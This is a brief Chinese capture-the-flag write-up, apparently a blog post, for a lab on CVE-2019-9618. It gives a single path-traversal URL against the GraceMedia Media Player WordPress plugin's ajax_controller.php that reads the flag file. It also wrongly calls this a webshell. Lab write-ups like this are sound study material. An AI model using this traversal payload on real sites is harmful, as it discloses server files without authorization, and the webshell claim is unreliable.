春秋云境CVE-2019-9618

1.阅读靶场介绍

没有任何思路

但是以往的wordpress会出现这个玩法可以试试

话不多说,进入正题

2.启动靶场

如下图所示

3.poc

直接在路径拼接上

https://eci-2ze8vcjw8w2qm243tmn5.cloudeci1.ichunqiu.com:80/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../flag

到此就可以完成webshell了

感谢您宝贵的时间

相关推荐
treesforest9 小时前
高精度IP定位怎么选?从企业需求出发的选型指南
网络·数据库·tcp/ip·web安全·ip·高精度ip查询
学逆向的10 小时前
汇编——位运算
开发语言·汇编·算法·网络安全
doiito(Do It Together)11 小时前
【Web安全,微服务安全】HashiCorp Vault 项目深度分析报告
web安全·微服务·安全架构
GEO_youxuan11 小时前
2026年儿童电话手表推荐:定位精度、通话安全与健康监测深度横评
安全
数据知道11 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
doiito13 小时前
【安全,架构】RustyVault 项目深度分析报告以及和HashiCorp Vault的差异
后端·安全·rust
福来阁86号技师14 小时前
2026-now 网络安全笔记
网络安全·ctf·awd
编程(变成)小辣鸡15 小时前
如何防止接口被恶意刷?
java·后端·网络安全
ylscode1 天前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
DianSan_ERP1 天前
电商架构演进:如何在高并发场景下实现多平台API的标准化履约?
运维·前端·网络·安全·架构·自动化